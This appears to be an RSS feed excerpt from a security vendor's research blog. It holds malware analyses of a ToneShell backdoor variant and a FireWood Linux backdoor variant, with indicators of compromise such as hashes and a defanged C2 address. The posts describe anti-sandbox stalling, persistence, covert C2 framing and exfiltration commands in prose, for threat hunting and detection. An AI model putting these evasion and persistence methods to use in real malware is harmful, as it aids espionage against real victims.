&lt;td&gt;cdc3355ae57cc371c6c0918c0b5451b9298fc7d7c7035fa4b24d0cd08af4122c&lt;/td&gt;
&lt;td&gt;C:\Users\user\AppData\Roaming\Microsoft\Windows\docc1.ps1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;dc2df351c306a314569b1eeaccf5046ce5a64df487fa51c907cb065e968bba80&lt;/td&gt;
&lt;td&gt;Вх.письмо_Мипромторг.lnk:..&lt;em&gt;..&lt;/em&gt;..&lt;em&gt;..&lt;/em&gt;.._Roaming_Microsoft_Windows_run.bat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;76e4d344b3ec52d3f1a81de235022ad2b983eb868b001b93e56deee54ae593c5&lt;/td&gt;
&lt;td&gt;Вх.письмо_Мипромторг.rar&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6a00b1ed5afcd63758b9be4bd1c870dbfe880a1a3d4e852bb05c92418d33e6da&lt;/td&gt;
&lt;td&gt;invite.pdf&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2abb9e7c155beaa3dcfa38682633dcbea42f07740385cac463e4ca5c6598b438&lt;/td&gt;
&lt;td&gt;(pdf document)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>Frankenstein Variant of the Toneshell Backdoor Targeting Myanmar</title><link>https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/</link><pubDate>Wed, 10 Sep 2025 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/</guid><description>
&lt;p&gt;ToneShell is a lightweight backdoor tied to the China-nexus group Mustang
Panda. Typically delivered via DLL sideloading inside compressed archives with
legitimate signed executables and often spread through cloud-hosted lures.
&lt;a href="https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1"target="_blank" rel="noopener"&gt;Zscaler’s&lt;/a&gt;
2025 analysis described updates to its FakeTLS C2 (shifting from TLS 1.2- to
1.3-style headers), use of GUID-based host IDs, a rolling-XOR scheme, and a
minimal command set for file staging and interactive shell access. Notably,
some of this activity was observed in Myanmar, a region of strategic importance
to China. Targeting Myanmar is particularly interesting as it reflects China’s
broader geopolitical interests, spanning border security, infrastructure
projects, and political developments, and highlights how cyber operations are
leveraged to maintain influence in neighboring states.&lt;/p&gt;
&lt;p&gt;This blog is a technical analysis of another variant of the backdoor. While
this variant does not introduce major new features, it is worth highlighting
the anti-analysis techniques it employs and the new indicators that can support
threat hunting and detection. In addition, the continued targeting of Myanmar
underscores China’s sustained use of cyber operations to maintain its interests
abroad.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;As previously documented, ToneShell is a dll that is sideloded by a legitimate
executable, usually bundled in the archive file. In this case it is a ZIP file,
named: TNLA နှင့် အခြားတော်လှန်ရေးအင်အားစုမျာ. Which translate to: TNLA and
other revolutionary forces.&lt;/p&gt;
&lt;p&gt;sha256: &lt;code&gt;1272a0853651069ed4dc505007e8525f99e1454f9e033bcc2e58d60fdafa4f0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The backdoor is a DLL named: SkinH.dll, compiled on 2025-07-14 22:38:08.&lt;/p&gt;
&lt;p&gt;sha256:
&lt;a href="https://analyze.intezer.com/files/e7b29611c789a6225aebbc9fee3710a57b51537693cb2ec16e2177c22392b546"target="_blank" rel="noopener"&gt;e7b29611c789a6225aebbc9fee3710a57b51537693cb2ec16e2177c22392b546&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig1.png" title="Code reuse with ToneShell" alt="Showing amount shared code with other ToneShell samples" loading="lazy" /&gt;
&lt;figcaption&gt;Code reuse with ToneShell&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The backdoor first checks the current module path for the string
&lt;code&gt;Google\\DriveFS\\Scratch&lt;/code&gt;. If not found, it enumerates processes to identify
the parent process, retrieves its image path, and verifies whether it contains
&lt;strong&gt;GoogleDrive&lt;/strong&gt;. If found, the backdoor will terminate its execution. This
check might be an attempt by the threat actor to prevent infecting themselves.
If this validation fails, the code enforces a single-instance policy using a
named mutex, &lt;code&gt;Global\\SingleCorporation12AD8B&lt;/code&gt;. It attempts to create the
mutex, storing the handle globally and setting a flag to indicate success or
failure. If creation fails or the mutex already exists, it releases any handles
and marks it as not created. Next, the backdoor checks its persistence
location. It compares its module path with the user profile directory
(CSIDL_APPDATA, 0x1A). If the binary is not under the user profile, it copies
itself and the following files: msvcr100.dll, msvcp100.dll, mfc100.dll to a new
folder it creates. The new directory name consists of a 6-character random
uppercase folder name (e.g., &lt;code&gt;C:\\Users\&amp;lt;user&amp;gt;\\AppData\&amp;lt;random-6-chars&amp;gt;&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig2.png" title="The function that copies the DLLs to a new folder in AppData" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The function that copies the DLLs to a new folder in AppData&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Once installed, it attempts to spin up the Task Scheduler COM service, connect
to the local scheduler, open the root folder (&amp;quot;\&amp;quot;) and obtain an
IRegisteredTask for a task named dokanctl. If the task doesn’t exist, it will
create it using RegisterTaskDefinition. The task is set to execute every
minute, it sets the execution path to the folder in AppData created earlier:
&lt;code&gt;%APPDATA%\&amp;lt;random-6-chars&amp;gt;\\svchosts.exe&lt;/code&gt;, and sets it as the action Path. The
task is registered in the root folder with the name &lt;code&gt;dokanctl&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig3.png" title="Task creation" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Task creation&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If the backdoor is already under the user profile, it performs junk arithmetic
before entering its C2 loop, followed by a bounded timing/zero-check loop that
appears to serve as anti-analysis noise without affecting the main flow.&lt;/p&gt;
&lt;h3&gt;API Function Hashing&lt;span class="hx:absolute hx:-mt-20" id="api-function-hashing"&gt;&lt;/span&gt;
&lt;a href="#api-function-hashing" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware uses a custom API-resolving scheme based on a simple rolling hash,
applying it to module and function names instead of storing them in cleartext.
This technique, previously analyzed in previous blogs, is a common evasion
method seen in different malware types. With the
&lt;a href="https://github.com/OALabs/hashdb/blob/main/algorithms/tonepipeshell.py"target="_blank" rel="noopener"&gt;HashDB project&lt;/a&gt;,
resolving these hashes back to the original imported functions is
straightforward, making analysis and detection easier.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig4.png" title="Hash calculation" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hash calculation&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig5.png" title="Resolved Windows API functions" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Resolved Windows API functions&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Anti-Analysis and Anti-Sandboxing&lt;span class="hx:absolute hx:-mt-20" id="anti-analysis-and-anti-sandboxing"&gt;&lt;/span&gt;
&lt;a href="#anti-analysis-and-anti-sandboxing" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;This ToolShell variant employs several stalling and anti-sandboxing tricks
designed to waste time, confuse automated analysis, and evade lightweight
sandboxes. These include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Repeated file churn: creating, writing, closing, and deleting a temporary
file in a loop with Sleep(100) delays, which burns execution time and
stresses filesystem emulation.&lt;/li&gt;
&lt;li&gt;Randomized sleep loops: several loops sleep for pseudo-random intervals
ranging from ~800 ms to over a second per iteration, accumulating 20+ seconds
of startup delay before meaningful behavior begins.&lt;/li&gt;
&lt;li&gt;Tick count checks: uses GetTickCount64() combined with jittered sleeps,
waiting until at least 10 seconds of wall-clock time has elapsed. This
ensures that emulators that don’t advance the system clock realistically can
get stuck.&lt;/li&gt;
&lt;li&gt;Opaque string comparisons: slides across a large embedded wide-string buffer,
repeatedly calling lstrcmpW() between overlapping substrings until a break
condition. The comparison results are discarded; the loop simply consumes
cycles and obfuscates control flow.&lt;/li&gt;
&lt;li&gt;Nonsense randomization: calculates values like 0xBABE or 0xCAFE via contrived
branches using rand(). These values are not security checks, but serve as
junk arithmetic to make the code harder to follow.&lt;/li&gt;
&lt;li&gt;Decoy API use: occasionally calls APIs such as OutputDebugStringA and sets
LastError to unusual constants (0xBADF00D), further muddying behavior without
altering core logic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig6.png" title="File creation loops" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;File creation loops&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Notably, the large embedded string buffers used in the comparison loop contain
text copied from
&lt;a href="https://openai.com/index/introducing-4o-image-generation/#:~:text=From%20the%20first%20cave%20paintings%20to%20modern%20infographics%2C%20humans%20have%20used%20visual%20imagery%20to%20communicate%2C%20persuade%2C%20and%20analyze%E2%80%94not%20just%20to%20decorate."target="_blank" rel="noopener"&gt;OpenAI’s blog&lt;/a&gt;
on image generation and from &lt;a href="https://www.pega.com/ai-innovation"target="_blank" rel="noopener"&gt;Pega AI’s&lt;/a&gt;
website. Pega AI refers to the artificial intelligence features integrated into
the Pega platform, a software suite for workflow automation and customer
relationship management. The backdoor does not use this content functionally;
instead, it serves as filler to inflate the binary and supply meaningless
strings for comparison.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig7.png" title="Text taken from PegaAI’s website" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Text taken from PegaAI’s website&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/09/frankenstein-variant-of-the-toneshell-backdoor-targeting-myanmar/images/fig8.png" title="Text taken from OpenAI’s website" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Text taken from OpenAI’s website&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Together, these techniques do not detect debuggers directly; instead, they
stall execution, pollute control flow with junk work, and frustrate automated
sandboxing systems that expect short-lived, straightforward malware runs.&lt;/p&gt;
&lt;h3&gt;GUID Creation&lt;span class="hx:absolute hx:-mt-20" id="guid-creation"&gt;&lt;/span&gt;
&lt;a href="#guid-creation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Similar to earlier versions, this variant of ToneShell generates a unique
identifier for each infected machine. It first attempts to check if one was
already created by reading 16 bytes from C:\ProgramData\SystemRuntimeLag.inc.
The malware creates a new seed if the file is missing, unreadable, or does not
provide exactly 16 bytes. The primary method is to generate a GUID via
CoCreateGuid and use it as the seed. If that fails, it falls back to producing
16 bytes using an internal linear congruential generator (LCG) seeded from the
current PRNG state. Once a new seed is generated, it is written back to the
designated file path to ensure persistence across executions.&lt;/p&gt;
&lt;p&gt;This logic is similar to Zscelar’s blog about the second backdoor variant.&lt;/p&gt;
&lt;h3&gt;Networking&lt;span class="hx:absolute hx:-mt-20" id="networking"&gt;&lt;/span&gt;
&lt;a href="#networking" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware sets up a socket with a C2 at the address:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;146.70.29[.]229:443&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The malware’s network protocol wraps its messages in a TLS-like record header
to blend in with legitimate traffic. Each packet begins with the fixed bytes 17
03 03 (TLS 1.2 Application Data) followed by a two-byte length field, but only
the low byte is honored, effectively capping payloads at 255 bytes. The 5-byte
header is read into a temporary stack buffer and discarded; only the payload
bytes are stored in the context structure’s receive buffer starting at offset
0.&lt;/p&gt;
&lt;p&gt;Once the payload is received, the malware XOR-decodes it in place with a
256-byte rolling key. The first decoded byte is treated as a “type/status”
field, the second as an additional code, and the remainder (len-2 bytes) as the
message body. The decoded buffer pointer is then saved in the structure for
later use. This design produces a simple packet format: [TLS-like
header][XOR-obfuscated type | code | body…], with the header stripped before
the data is available to the rest of the malware.&lt;/p&gt;
&lt;p&gt;Interestingly, while the GUID generation logic in this sample aligns with the
first version of ToneShell described by Zscaler, the communication protocol
remains identical to the second version. Combined with the anti-analysis
techniques and the use of text copied from AI platforms, this sample stands out
as a hybrid variant.&lt;/p&gt;
&lt;h3&gt;Pivoting on The C2 Address&lt;span class="hx:absolute hx:-mt-20" id="pivoting-on-the-c2-address"&gt;&lt;/span&gt;
&lt;a href="#pivoting-on-the-c2-address" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Pivoting on the C2 address, we were also able to find another variant:&lt;/p&gt;
&lt;p&gt;sha256: &lt;code&gt;a58868b3d50b775de99278eeb14da8b7409b165aa45313c6d9fa35ac30d2cda2&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This variant was compiled on 2025-03-23 22:42:42, named node.dll. It was part
of an archive named: update.zip with the sha256:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;543024edc9f160cc1cedcffc3de52bfa656daa0ec9ed351331d97faaa67d0d99&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This variant reuses the same C2 commands and anti-analysis techniques described
above, and it stores the GUID under the same file name.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In summary, this analysis of a new ToneShell backdoor variant highlights the
evolving tactics of the Mustang Panda group, particularly their sustained
targeting of Myanmar. While not introducing revolutionary features, this
variant employs anti-analysis techniques, including elaborate stalling
mechanisms and obfuscated code. The blend of old and new elements, such as the
consistent communication protocol alongside updated GUID generation and the use
of seemingly random, copied text for filler, underscores the adaptive nature of
this threat. The continuous refinement of these evasion methods, coupled with
the geopolitical significance of the targeted region, reinforces the need for
ongoing research and threat hunting to counter cyber operations.&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;ToneShell variants:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;a58868b3d50b775de99278eeb14da8b7409b165aa45313c6d9fa35ac30d2cda2&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;e7b29611c789a6225aebbc9fee3710a57b51537693cb2ec16e2177c22392b546&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Archive files:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;543024edc9f160cc1cedcffc3de52bfa656daa0ec9ed351331d97faaa67d0d99&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;1272a0853651069ed4dc505007e8525f99e1454f9e033bcc2e58d60fdafa4f0&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;C2:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;146.70.29[.]229:443&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Fire in the Woods – A New Variant of FireWood</title><link>https://research.intezer.com/blog/2025/08/threat-bulletin-firewood/</link><pubDate>Wed, 13 Aug 2025 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2025/08/threat-bulletin-firewood/</guid><description>
&lt;p&gt;&lt;em&gt;A new and low-detected variant of the FireWood backdoor was discovered by
Intezer’s Research Team, with some changes in the implementation and the
configuration of the backdoor.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;FireWood is a Linux backdoor
&lt;a href="https://www.welivesecurity.com/en/eset-research/unveiling-wolfsbane-gelsemiums-linux-counterpart-to-gelsevirine/"target="_blank" rel="noopener"&gt;discovered&lt;/a&gt;
by ESET’s research team. They linked it to the long‑running &amp;ldquo;Project Wood&amp;rdquo;
malware lineage, which dates back to at least 2005 and includes usage in the
earlier Operation TooHash campaign. It functions as a remote access trojan
(RAT) on Linux systems, employing kernel‑level rootkit modules (e.g.,
usbdev.ko) and TEA‑based encryption to hide its presence, maintain persistence,
and communicate covertly with its command‑and‑control infrastructure. Once
deployed, likely via web shells left on compromised Linux desktops, it enables
attackers to execute commands, exfiltrate sensitive data such as system
information and credentials, and operate stealthily over prolonged espionage
operations. The backdoor has low confidence connections to the China-aligned
Gelsemium APT group, as the overlaps may be coincidental or reflect shared
tools across multiple groups.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We found a new and low-detected variant of the FireWood backdoor&lt;/strong&gt;. The core
functionality of the backdoor remains the same but we did notice some changes
in the implementation and the configuration of the backdoor. It is unclear if
the kernel module was also updated as we were not able to collect it.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/08/threat-bulletin-firewood/images/fig1.png" title="Code analysis of the new version in Intezer." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Code analysis of the new version in Intezer.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/08/threat-bulletin-firewood/images/fig2.png" title="SHA256: 898a5bd86c5d99eb70088a90f1d8f90b03bd38c15a232200538d0601c888acb6" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;SHA256: 898a5bd86c5d99eb70088a90f1d8f90b03bd38c15a232200538d0601c888acb6&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Technical Analysis of New Firewood Variant&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis-of-new-firewood-variant"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis-of-new-firewood-variant" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In the older variant, execution began with an explicit permission gate, calling
&lt;code&gt;CUser::IsSuc()&lt;/code&gt;, and the process would exit if this check failed. In the newer
build, that early check is removed entirely. The new version defers any
root‑or‑kernel gating until after it daemonizes and saves its PID. To achieve
this, the code splits the former &lt;code&gt;SavePidAndCheckKernel()&lt;/code&gt; helper into two
discrete steps: an early &lt;code&gt;SavePid(pid)&lt;/code&gt;, followed later by
&lt;code&gt;CModuleControl::AutoLoad()&lt;/code&gt; and &lt;code&gt;CheckLkmLoad()&lt;/code&gt;. This separation clarifies
the startup sequence and enhances the hide‑via‑kernel‑module logic.
Additionally, rather than simply sending a stripped‑down identifier, the
updated version builds a larger buffer containing the process name,
hex‑formatted port, PID, a hardcoded “kde‑tra” process name, and a configurable
flag (or the literal “nothing”). That extra metadata is passed through
&lt;code&gt;CHideProcess::NetLinkInit()&lt;/code&gt;,
&lt;code&gt;CHideProcess::SendProcessName(&amp;amp;CHideProcess::mInstance)&lt;/code&gt;, and
&lt;code&gt;CHideProcess::Destroy()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note the typo in the method name &amp;ldquo;Destroy&amp;rdquo;, this error also appears in the
older Firewood variant. Another typo persists in both versions in the following
error message: &amp;ldquo;Get Memory Faile&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/08/threat-bulletin-firewood/images/fig3.png" title="New evasion implementation and comparison of main functions" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;New evasion implementation and comparison of main functions&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;On the networking side, the older version read configuration settings that
defined both the number of days between beaconing and a &lt;code&gt;delayTime&lt;/code&gt; specifying
the interval between packets. It also used a randomized time‑window algorithm
to stagger connections. The new build collapses all of this into a
straightforward &lt;code&gt;while (true)&lt;/code&gt; loop. After waiting for the configured startup
delay, it continuously calls &lt;code&gt;ConnectToSvr()&lt;/code&gt;, sleeping briefly on failure,
until success or until the overall timer expires, then cleans up and exits. By
removing the multi‑stage scheduling and random timing logic, the connection
routine becomes more predictable and maintainable, trading temporal obfuscation
for reliable C2 reachability.&lt;/p&gt;
&lt;p&gt;Overall, the communication protocol and C2 setup remain the same; the only
significant change is that the new version no longer relies on timeouts from
the configuration.&lt;/p&gt;
&lt;p&gt;Both Firewood versions collect information about the user and the infected
machine. The new variant adds a fallback for OS detection: whereas the older
version reads distribution data from &lt;code&gt;/etc/issue&lt;/code&gt;, the new version falls back
to &lt;code&gt;/etc/issue.ne&lt;/code&gt;t if &lt;code&gt;/etc/issue&lt;/code&gt; is unavailable, parsing the data in the
same way.&lt;/p&gt;
&lt;p&gt;The backdoor defines file paths used by both itself and its kernel module. The
new variant sets paths for root users as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/usr/lib/.kde-root/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/lib/.kde-root/lib/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/lib/.kde-root/data/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/lib/.kde-root/kdeinit&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/lib/.kde-root/pid&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/init.d/rc.local&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For non-root users, it uses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;$HOME/.kde-root/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;$HOME/.kde-root/lib/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;$HOME/.kde-root/data/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;$HOME/.kde-root/kdeinit&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;$HOME/.kde-root/pid&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;$HOME/.bashrc&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By contrast, the older variant for root users used:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/etc/init.d/rc.local&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/rc.d/rc.local&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/init.d/boot.local&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And for non-root users:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;$HOME/.bashrc&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The FireWood backdoor supports a number of commands documented by ESET. The new
variant removes some commands and adds others. It drops commands for changing
beacon intervals and delay times (command IDs &lt;code&gt;0x111&lt;/code&gt;, &lt;code&gt;0x113&lt;/code&gt;, &lt;code&gt;0x114&lt;/code&gt;), as these
settings are no longer used. It also removes the file-read command (ID &lt;code&gt;0x201&lt;/code&gt;).
The process‑hiding command has moved to ID &lt;code&gt;0x202&lt;/code&gt; (from &lt;code&gt;0x112&lt;/code&gt;), and the
&lt;code&gt;HideModule&lt;/code&gt; function was removed. A new command (&lt;code&gt;SetAutoKillEl&lt;/code&gt;, ID &lt;code&gt;0x160&lt;/code&gt;)
toggles or sets an “auto‑kill” feature in the agent.&lt;/p&gt;
&lt;p&gt;Besides these commands, there are also three commands that appear in both
versions and were not previously documented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Command id &lt;code&gt;0x109&lt;/code&gt;: A command that indicates a change in the connection
configuration.&lt;/li&gt;
&lt;li&gt;Command id &lt;code&gt;0x192&lt;/code&gt;: Gets a file from the C2 and execute it using the system
function. Unlike the previously documented command id &lt;code&gt;0x185&lt;/code&gt;, this command
calls first &lt;code&gt;CFileControl::FileUp&lt;/code&gt; to receive the file from the C2.&lt;/li&gt;
&lt;li&gt;Command id &lt;code&gt;0x195&lt;/code&gt;: Exfiltration of files with the following extensions: &lt;code&gt;.v2&lt;/code&gt;,
&lt;code&gt;.k2&lt;/code&gt;, &lt;code&gt;.W2&lt;/code&gt;, and &lt;code&gt;drive.C2&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We also located an older sample submitted to VirusTotal from Iran on February
5, 2025:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;4c293309a7541edb89e3ec99c4074584328a21309e75a46d0ddb4373652ee0d6&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, we found a sample from the Philippines submitted on May 7, 2022;
its code is identical to the one we analyzed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;d7be3494b3e1722eb28f317f3b85ee68bf7ea5508aa2d5782392619e078b78af&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;New Firewood Version&lt;span class="hx:absolute hx:-mt-20" id="new-firewood-version"&gt;&lt;/span&gt;
&lt;a href="#new-firewood-version" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;898a5bd86c5d99eb70088a90f1d8f90b03bd38c15a232200538d0601c888acb6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d7be3494b3e1722eb28f317f3b85ee68bf7ea5508aa2d5782392619e078b78af&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Old Firewood Version&lt;span class="hx:absolute hx:-mt-20" id="old-firewood-version"&gt;&lt;/span&gt;
&lt;a href="#old-firewood-version" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;cff20753e36a4c942dc4dab5a91fd621a42330e17a89185a5b7262280bcd9263&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4c293309a7541edb89e3ec99c4074584328a21309e75a46d0ddb4373652ee0d6&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Emerging Phishing Techniques New Threats and Attack Vectors</title><link>https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/</link><pubDate>Wed, 23 Apr 2025 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2025/04/emerging-phishing-techniques-new-threats-and-attack-vectors/</guid><description>
&lt;p&gt;Phishing remains
&lt;a href="https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/common-cyberattacks/"target="_blank" rel="noopener"&gt;one of the most prevalent&lt;/a&gt;
and successful attack vectors used by cybercriminals today. It exploits human
psychology, leveraging deception to trick users into revealing sensitive
information or executing malicious actions. Attackers continuously evolve
tactics to bypass modern email and endpoint security solutions, making
detecting and mitigating phishing attempts increasingly difficult. And despite
advancements in cybersecurity tools, many phishing campaigns still successfully
reach users’ inboxes.&lt;/p&gt;
&lt;p&gt;At Intezer, we
&lt;a href="https://intezer.com/blog/alert-triage/2024-ai-soc-review-for-security-operations/"target="_blank" rel="noopener"&gt;triage millions of alerts&lt;/a&gt;
for enterprises around the globe and have implemented a rigorous quality
assurance process to ensure that our verdicts are the most accurate and
up-to-date. From this extensive dataset, the Intezer research team is able to
pinpoint emerging trends in the phishing and malware ecosystems. That said, our
team has observed four phishing threats and techniques gaining traction, all of
which successfully bypassed email protections and reached the intended victims.
These methods demonstrate the increasing sophistication of threat actors and
highlight the need for improved detection mechanisms.&lt;/p&gt;
&lt;p&gt;Here are some impactful phishing threats and techniques that Intezer has
observed in 2025 so far.&lt;/p&gt;
&lt;h2&gt;1. Script in the Shadows: Base64 JavaScript Lurking in SVG Files&lt;span class="hx:absolute hx:-mt-20" id="1-script-in-the-shadows-base64-javascript-lurking-in-svg-files"&gt;&lt;/span&gt;
